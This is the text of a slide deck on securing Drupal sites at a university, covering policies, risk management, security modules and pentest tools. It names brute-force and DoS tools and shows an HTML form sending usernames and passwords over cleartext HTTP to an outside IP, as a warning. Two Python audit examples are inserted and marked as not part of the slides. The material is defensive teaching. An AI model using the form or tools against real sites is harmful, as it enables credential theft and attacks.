one drupal in the bucket · 2018-11-16 · one drupal in the bucket: keeping web infrastructure...
One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood
Eric Samboy
Hayden Bacon
The day I came to the USA
Beautiful Country
Ready for crossing the street?
Quick Warmup
Website Hacking Statistics
• 1.86 billion websites on the internet.
• 1% of these websites are known to be infected.
[0] https://www.securityweek.com/185-million-websites-infected-malware-any-time
[1] https://www.webarxsecurity.com/website-hacking-statistics-2018-february/
How does SASG use Drupal?
• About 100 Drupal UA websites.
• UA Quickstart & UA Zen
How big is Drupal?
• One of the largest open source communities in the world.
• Used by more than 1 million sites on the internet.
• 800 thousand Drupal 7.x
• 225 thousand Drupal 8.x
Security Concerns
• Greater risk of being attacked.
• More vulnerabilities are discovered and exploited
• How do we keep our web infrastructure safe?
https://www.keycdn.com/blog/drupal-security
Outline
• Our Drupal Security Policies
• Drupal Modules
• Drupal Core
• Access Control
• Security Awareness
• UA Cybersecurity Framework
• Risk Management & Analysis
• Security Best Practices
Our Drupal Security Policies
• Keep Drupal and Modules updated
• Access Control
• Security Awareness
• Contributed Modules Installation
Our Drupal Security Policies
Contributed Modules Installation
Risk Management
• Guidance to mitigate cyber risks
National Institute of Standards and Technology (NIST) Framework
• Best practice
• Business continuity plan
https://confluence.arizona.edu/display/UAIS/UA+Cybersecurity+Framework+and+Risk+Assessment
Risk Management
• Asset Management
• Business Environment
• Governance
• Risk Assessment
• Risk Management Strategy
Risk Management
• Access Control
• Awareness & Training
• Data Security
• Policies & Procedures
• Maintenance
• Protective Technology
Risk Management
• Anomalies & Events
• Continuous Monitoring
• Detection Processes
Risk Management
• Response Planning
• Communications
• Analysis
• Mitigation
• Improvements
Risk Management
• Recovery Planning
• Improvements
• Communications
Conclusion
What to take away.
• Doors are only as secure as their locks.
• We all have the responsibility to follow best practice.
And now…
Hayden will cover:
• Drupal Penetration Testing
• More Security Policies
• Drupal statistics
• Being afraid, but not too afraid
Drupal Penetration Testing
1. What do we look for?
2. What tools do we use?
What to look for
• HTTP or HTTPS
• Drupal version
• PHP version
• Apache version
• OS version
• Reverse Proxies
• Custom Modules
• Passwords
Drupwn
What tools we use
Enumeration tool:
• User enumeration
• Node enumeration
• Default files enumeration
• Module enumeration
• Theme enumeration
• Cookies support
• User-Agent support
• Basic authentication support
• Request delay
• Enumeration range
• Logging
• Socks and HTTP proxy support
X Brute Forcer
What tools we use
Brute force passwords for:
• WordPress
• Joomla
• Drupal
• OpenCart
• Magento
Switchblade HTTP DoS Tool
What tools we use
OWASP Switchblade
What tools we use
More Drupal Security Policies
• Serve over HTTPS
• File permissions
• Secure connections
• Database Security
• Hardened HTTPS Security
• Drupal Security Modules
Why serve over HTTPS?
“All websites should use HTTPS, even if they don't include private content, sign-in pages, or credit card details.”
- UK National Cyber Security Centre
[0] https://www.ncsc.gov.uk/blog-post/serve-websites-over-https-always
<form action="http://34.218.2.81/notyourform" method="POST">
<input name="username" value="username">
<input name="password" value="password">
</form>
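An added example, not part of the original slides: a defender-side audit in Python that flags forms like the one above, whose action sends the username and password fields to a cleartext http:// endpoint on a different host. The page URL, the sample markup around the slide's form and the field-name heuristic are assumptions of this example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

SENSITIVE_NAMES = ("pass", "pwd", "user", "login", "email")  # assumed heuristic


class FormCollector(HTMLParser):
    """Record every <form> with its resolved action, method and input fields."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            # A missing or relative action resolves against the page URL.
            self._current = {
                "action": urljoin(self.page_url, attrs.get("action") or ""),
                "method": (attrs.get("method") or "GET").upper(),
                "fields": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            name = (attrs.get("name") or "").lower()
            kind = (attrs.get("type") or "text").lower()
            self._current["fields"].append((name, kind))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_forms(page_url, html):
    """Return one finding per form whose submission can be read or redirected."""
    collector = FormCollector(page_url)
    collector.feed(html)
    page = urlsplit(page_url)
    findings = []
    for form in collector.forms:
        target = urlsplit(form["action"])
        sensitive = any(
            kind == "password" or any(s in name for s in SENSITIVE_NAMES)
            for name, kind in form["fields"]
        )
        reasons = []
        if page.scheme != "https":
            reasons.append("page-served-over-http")   # markup can be rewritten in transit
        if target.scheme != "https":
            reasons.append("cleartext-action")        # submission is readable on the wire
        if target.netloc.lower() != page.netloc.lower():
            reasons.append("cross-origin-action")     # data leaves the site
        if sensitive and form["method"] != "POST":
            reasons.append("credentials-in-url")
        if reasons:
            findings.append({"action": form["action"], "sensitive": sensitive, "reasons": reasons})
    return findings


# Constructed sample page: a normal login form, a search form, and the slide's form.
SAMPLE_HTML = """
<form action="/user/login" method="post">
  <input name="name"><input name="pass" type="password">
</form>
<form action="/search" method="get"><input name="keys"></form>
<form action="http://34.218.2.81/notyourform" method="POST">
  <input name="username" value="username">
  <input name="password" value="password">
</form>
"""

print(audit_forms("https://www.example.edu/user/login", SAMPLE_HTML))
```

Served over HTTPS, only the third form is reported; auditing the same markup as if the page were served over HTTP reports all three, because every relative action then resolves to a cleartext URL.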
Why serve over HTTPS?
<!-- Google Analytics -->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-XXXXX-Y', 'auto');
ga('send', 'pageview');
</script>
<!-- End Google Analytics -->
Use only secure connections:
Databases:
Database Best Practices:
• Use different database credentials between environments.
• Use a longer random password, which should not contain special characters, except : @ . , / + - ! =
• Use a random table name prefix.
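An added example, not from the original slides: Python code that generates credentials following the three rules above and audits per-environment database settings against them. The minimum length of 24, the dictionary layout and the sample values are assumptions of this example.

```python
import secrets
import string

ALLOWED_SPECIALS = ":@.,/+-!="      # the exceptions listed on the slide
PASSWORD_ALPHABET = string.ascii_letters + string.digits + ALLOWED_SPECIALS
MIN_LENGTH = 24                     # assumption: the slide only says "longer"


def new_password(length=32):
    """Random password drawn only from letters, digits and the allowed specials."""
    return "".join(secrets.choice(PASSWORD_ALPHABET) for _ in range(length))


def new_table_prefix(length=8):
    """Random table prefix: starts with a letter, ends with an underscore."""
    tail = string.ascii_lowercase + string.digits
    body = "".join(secrets.choice(tail) for _ in range(length - 1))
    return secrets.choice(string.ascii_lowercase) + body + "_"


def audit(environments):
    """Return (environment, problem) pairs for settings that break the three rules."""
    problems, seen = [], {}
    for env, cfg in environments.items():
        password = cfg.get("password", "")
        bad = sorted(set(password) - set(PASSWORD_ALPHABET))
        if bad:
            problems.append((env, "disallowed characters: " + "".join(bad)))
        if len(password) < MIN_LENGTH:
            problems.append((env, "password shorter than %d" % MIN_LENGTH))
        credentials = (cfg.get("username"), password)
        if credentials in seen:
            problems.append((env, "credentials shared with " + seen[credentials]))
        seen.setdefault(credentials, env)
        if not cfg.get("prefix"):
            problems.append((env, "no table prefix"))
    return problems


# Constructed settings for three environments (all values are made up).
SAMPLE = {
    "dev": {"username": "drupal", "password": "drupal#2018", "prefix": ""},
    "test": {"username": "drupal", "password": "drupal#2018", "prefix": ""},
    "prod": {"username": "drupal_prod", "password": new_password(),
             "prefix": new_table_prefix()},
}

if __name__ == "__main__":
    for env, problem in audit(SAMPLE):
        print(env, "-", problem)
```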
HTTP Strict-Transport-Security:
Public Key Pinning:
These modules can help you:
• Login Security: Limit number of login attempts and deny access by IP address.
• ACL: Access control lists for access to nodes.
• Password policy: Define more secure password policies for users.
• Captcha: Block form submissions from spambots/scripts.
• Automated Logout: Allows administrators to log out users after a specified time period.
• Session Limit: Limit the number of simultaneous sessions per user.
• Content Access: Permissions for content types by role and author.
• Coder: Checks your Drupal code against coding standards and best practices.
• SpamSpan filter: Obfuscates email addresses to help prevent spambots from collecting them.
• Hacked!: Check to see if there have been changes to Drupal core or themes.
326 Vulnerabilities Reported
[0] https://www.cvedetails.com/vendor/1367/Drupal.html
328 Vulnerabilities Reported
[0] https://www.cvedetails.com/vendor/1367/Drupal.html
What are attackers using?
[0] https://sucuri.net/reports/Sucuri-Hacked-Report-2017.pdf
Backdoor: Artifacts used to re-infect or retain access.
Malware: Generic browser-side code to trigger malware downloads.
SEO Spam: Create dummy content with backlinks to another website, to boost SEO.
Mailer: Abuse server resources to send spam email.
Phishing: Attempts to trick users into sharing sensitive information.
Drupal is Lucky
[0] https://sucuri.net/reports/Sucuri-Hacked-Report-2017.pdf
Drupal is Lucky
CMS Market Share (% of top 10M websites)
[0] https://w3techs.com/technologies/overview/content_management/all
Drupal is Lucky
[0] https://w3techs.com/technologies/overview/content_management/all
[1] https://sucuri.net/reports/Sucuri-Hacked-Report-2017.pdf
Drupal is Lucky
1. Alex Bronstein (effulgentsia) - IRC nick: effulgentsia, Organization: Acquia
2. Alex Pott (alexpott) - IRC nick: alexpott, Organization: Acro Media, Thunder
3. Angie Byron (webchick) - IRC nick: webchick, Organization: Acquia
4. Ben Dougherty (benjy) - IRC nick: benjy, Organization: PreviousNext
5. Ben Jeavons (coltrane) - IRC nick: coltrane, Organization: CARD.com
6. Cash Williams (cashwilliams) - IRC nick: CashWilliams, Organization: Acquia
7. Cathy Theys (YesCT) - IRC nick: YesCT, Organization: BlackMesh
8. Chris McCafferty (cilefen) - IRC nick: cilefen, Organization: Institute for Advanced Study
9. Damien McKenna (DamienMcKenna) - IRC nick: dmckenna, Organization: Mediacurrent
10. Dan Smith (galooph) - IRC nick: galooph, Organization: Code Enigma
11. Dave Reid (Dave Reid) - IRC nick: davereid, Organization: Lullabot
12. David Rothstein (David_Rothstein) - IRC nick: David_Rothstein, Organization:
13. David Snopek (dsnopek) - IRC nick: dsnopek, Organization: myDropWizard
14. David Stoline (dstol) - IRC nick: dstol, Organization: Acquia
15. David Strauss (David Strauss) - IRC nick: davidstrauss, Organization: GetPantheon
16. Dries Buytaert (Dries) - IRC nick: Dries__, Organization: Acquia
17. Gerhard Killesreiter ([email protected]) - IRC nick: killes, Organization:
18. Greg Knaddison (greggles) - IRC nick: greggles, Organization: CARD.com
19. Heine Deelstra (Heine) - IRC nick: Heine, Organization: LimoenGroen
20. Ivo Van Geertruyen (mr.baileys) - IRC nick: mrbaileys, Organization: Calibrate
21. James Gilliland (neclimdul) - IRC nick: neclimdul, Organization: APQC
22. Lee Rowlands (larowlan) - IRC nick: larowlan, Organization: PreviousNext
23. Michael Hess (mlhess) - IRC nick: digiv, Organization: University of Michigan
24. Mike Potter (mpotter) - IRC nick: mpotter, Organization: Phase2
25. Mori Sugimoto (dokumori) - IRC nick: dokumori, Organization: Share & Thrive
26. Moshe Weitzman (moshe weitzman) - IRC nick: moshe_work, Organization:
27. Nathaniel Catchpole (catch) - IRC nick: catch, Organization: Tag1 Consulting
28. Neil Drumm (drumm) - IRC nick: drumm, Organization: Drupal Association
29. Peter Wolanin (pwolanin) - IRC nick: pwolanin, Organization: BioRAFT
30. Stefan Ruijsenaars (stefan.r) - IRC nick: stefan_r, Organization: Ruijsenaars Development
31. Stella Power (stella) - IRC nick: stella, Organization: Annertech
32. xjm (xjm) - IRC nick: xjm, Organization: Acquia
In Conclusion